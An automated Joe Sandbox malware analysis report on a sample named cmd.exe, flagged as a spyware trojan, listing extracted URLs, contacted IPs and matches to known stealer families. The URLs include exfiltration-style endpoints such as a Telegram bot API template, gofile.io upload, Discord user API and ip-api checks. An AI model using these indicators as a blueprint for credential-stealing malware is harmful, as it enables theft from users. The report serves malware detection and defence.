                                                          https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.1921700261.0000022BECA36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908083358.000002169CC80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1859004442.000002168E42F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908083358.000002169CB3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://discord.com/api/v9/users/cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963cmd.exe, 00000001.00000002.2098654232.000001C916D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://crl.microsuspowershell.exe, 0000000A.00000002.1941584429.0000022BF4FD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://api.telegram.org/bot%s/%spcmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.reddit.com/cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.1861065562.0000022BDC9C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1859004442.000002168CAC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.amazon.ca/cmd.exe, 00000001.00000002.2098986140.000001C917160000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000001C.00000003.1775846241.00000240CA8C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.drfalse
                                                                          		high
                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenamecmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1705592637.000001C914409000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915C70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxycmd.exe, 00000001.00000002.2098765612.000001C916E50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915CFC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.ebay.co.uk/cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000002A.00000002.1859004442.000002168E3A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000A.00000002.1861065562.0000022BDCBE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.ebay.de/cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000002A.00000002.1859004442.000002168E3A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codecmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915CFC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1705592637.000001C914409000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://go.micropowershell.exe, 0000002A.00000002.1859004442.000002168D998000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readercmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095198142.000001C9143C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.amazon.com/cmd.exe, 00000001.00000002.2098986140.000001C917160000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://contoso.com/Iconpowershell.exe, 0000002A.00000002.1908083358.000002169CB3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://httpbin.org/cmd.exe, 00000001.00000002.2097860677.000001C916A25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://crl.comodoicmd.exe, 00000001.00000003.2092429001.000001C91686B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1756903455.000001C91687D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2096563852.000001C91686B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://crl.ver)svchost.exe, 0000001C.00000002.2945905884.00000240CA600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0scmd.exe, 00000000.00000003.1701072162.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                                                                                                            		high
                                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_modulecmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915CFC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachescmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915C70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.ecosia.org/newtab/cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brcmd.exe, 00000001.00000003.1758937487.000001C9168E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1788462213.000001C9168E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1758937487.000001C91688E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.youtube.com/cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://allegro.pl/cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://github.com/Pester/Pesterpowershell.exe, 0000002A.00000002.1859004442.000002168E3A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535cmd.exe, 00000001.00000002.2097860677.000001C9169B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sycmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095198142.000001C9143C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://MD8.mozilla.org/1/mcmd.exe, 00000001.00000002.2098403824.000001C916CB7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1794009198.000001C916CB6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C917A04000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1936188709.000001C916CB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://ocsp.sectigo.com0$cmd.exefalse
                                                                                                                                  		high
                                                                                                                                  https://www.bbc.co.uk/cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://bugzilla.mocmd.exe, 00000001.00000002.2100068134.000001C917A04000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://tools.ietf.org/html/rfc6125#section-6.4.3cmd.exe, 00000001.00000002.2098765612.000001C916E50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://api.telegram.org/bot%s/%s)cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000A.00000002.1861065562.0000022BDCBE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://google.com/mailcmd.exe, 00000001.00000002.2097860677.000001C916A25000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2096563852.000001C916829000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2092429001.000001C916827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://packaging.python.org/specifications/entry-points/cmd.exe, 00000001.00000002.2098872517.000001C916F80000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2098765612.000001C916E50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pycmd.exe, 00000001.00000002.2095198142.000001C9143C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.google.com/cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://www.iqiyi.com/cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://foss.heptapod.net/pypy/pypy/-/issues/3539cmd.exe, 00000001.00000002.2098654232.000001C916D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.cmd.exe, 00000001.00000002.2097860677.000001C9169B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://google.com/cmd.exe, 00000001.00000002.2097860677.000001C9169B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFcmd.exe, 00000001.00000003.1788462213.000001C9168E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://ocsp.sectigo.com0cmd.exe, rar.exe.0.drfalse
                                                                                                                                                                		high
                                                                                                                                                                http://crl.comodocmd.exe, 00000001.00000003.2093290332.000001C91692B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2097775097.000001C91692B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://www.python.org/download/releases/2.3/mro/.cmd.exe, 00000001.00000002.2095490915.000001C915C70000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://contoso.com/Licensepowershell.exe, 0000002A.00000002.1908083358.000002169CB3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://discordapp.com/api/v9/users/cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourcecmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1705592637.000001C914409000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915C70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://ip-api.com/line/?fields=hostingr;cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://ip-api.com/json/?fields=225545rcmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_speccmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915CFC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#cmd.exefalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://github.com/urllib3/urllib3/issues/2920cmd.exe, 00000001.00000002.2098765612.000001C916E50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#cmd.exe, 00000000.00000003.1701072162.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsCcmd.exe, 00000001.00000002.2098654232.000001C916D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_datacmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095198142.000001C9143C0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1705592637.000001C914409000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://yahoo.com/cmd.exe, 00000001.00000002.2097860677.000001C916A25000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2096563852.000001C916829000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2092429001.000001C916827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://account.bellmedia.ccmd.exe, 00000001.00000002.2100068134.000001C917A74000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C79000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6cmd.exe, 00000001.00000002.2096563852.000001C916813000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://api.gofile.io/getServerr;rcmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://g.live.com/odclientsettings/ProdV2edb.log.28.drfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://login.microsoftonline.comcmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C79000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C917A58000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://crl.thawte.com/ThawteTimestampingCA.crl0cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701072162.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://html.spec.whatwg.org/multipage/cmd.exe, 00000001.00000002.2097860677.000001C9169B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://www.ifeng.com/cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningscmd.exe, 00000001.00000002.2098872517.000001C916F80000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2098654232.000001C916D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://www.zhihu.com/cmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C917A04000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high

                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                208.95.112.1
                                                                                                                                                                                                                		ip-api.comUnited States
                                                                                                                                                                                                                		53334TUT-ASUSfalse
                                                                                                                                                                                                                162.159.128.233
                                                                                                                                                                                                                		discord.comUnited States
                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                                Private

                                                                                                                                                                                                                IP
                                                                                                                                                                                                                127.0.0.1

                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                Analysis ID:1561562
                                                                                                                                                                                                                Start date and time:2024-11-23 19:43:06 +01:00
                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                Overall analysis duration:0h 10m 31s
                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                Number of analysed new started processes analysed:86
                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                Sample name:cmd.exe
                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                Classification:mal100.troj.spyw.expl.evad.winEXE@135/56@2/3
                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                • Successful, ratio: 40%
                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                • Successful, ratio: 99%
                                                                                                                                                                                                                • Number of executed functions: 95
                                                                                                                                                                                                                • Number of non-executed functions: 148
                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                • Found application associated with file extension: .exe

                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 172.217.17.67, 2.18.109.164
                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, gstatic.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                • Execution Graph export aborted for target mshta.exe, PID 7516 because there are no executed function
                                                                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7484 because it is empty
                                                                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 8300 because it is empty
                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                • VT rate limit hit for: cmd.exe

                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                13:44:06API Interceptor118x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                13:44:08API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                13:44:09API Interceptor5x Sleep call for process: WMIC.exe modified

                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                208.95.112.1z81zEuzkJPHHV3KYua.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                                • ip-api.com/json/
                                                                                                                                                                                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                                • ip-api.com/json/
                                                                                                                                                                                                                NeftPaymentError_details__Emdtd22102024_jpg.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                                • ip-api.com/json/
                                                                                                                                                                                                                Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                HnJdZm51Xl.exeGet hashmaliciousAmadey, Clipboard HijackerBrowse
                                                                                                                                                                                                                • ip-api.com/line/
                                                                                                                                                                                                                file.exeGet hashmaliciousJasonRATBrowse
                                                                                                                                                                                                                • ip-api.com/json/?fields=11827
                                                                                                                                                                                                                Fulloption_V2.1.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                BoostFPS.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                New_Order_Inquiry.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                162.159.128.233file.exeGet hashmaliciousLummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRATBrowse
                                                                                                                                                                                                                • discord.com/phpMyAdmin/

                                                                                                                                                                                                                Domains

                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                ip-api.comz81zEuzkJPHHV3KYua.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                NeftPaymentError_details__Emdtd22102024_jpg.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                http://christians-google-sh-97m2.glide.page/dl/d0a5f4Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 208.95.112.2
                                                                                                                                                                                                                HnJdZm51Xl.exeGet hashmaliciousAmadey, Clipboard HijackerBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                file.exeGet hashmaliciousJasonRATBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                Fulloption_V2.1.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                BoostFPS.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                discord.comspacers.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.159.138.232
                                                                                                                                                                                                                EternalPredictor.exeGet hashmaliciousBlank Grabber, Skuld Stealer, XWormBrowse
                                                                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                                                                program.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                • 162.159.137.232
                                                                                                                                                                                                                RuntimeusererVers.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                • 162.159.138.232
                                                                                                                                                                                                                NEVER OPEN!.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                                                                                                                                                                                • 162.159.137.232
                                                                                                                                                                                                                HeilHitler.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                • 162.159.128.233
                                                                                                                                                                                                                file.exeGet hashmaliciousCStealerBrowse
                                                                                                                                                                                                                • 162.159.138.232
                                                                                                                                                                                                                B78DGDwttv.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                                                                                • 162.159.135.232
                                                                                                                                                                                                                YDW0S5K7hi.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                                                                                • 162.159.137.232
                                                                                                                                                                                                                cDRgXaadjD.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                                                                                • 162.159.128.233

                                                                                                                                                                                                                ASNs

                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                TUT-ASUSz81zEuzkJPHHV3KYua.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                                • 208.95.112.1
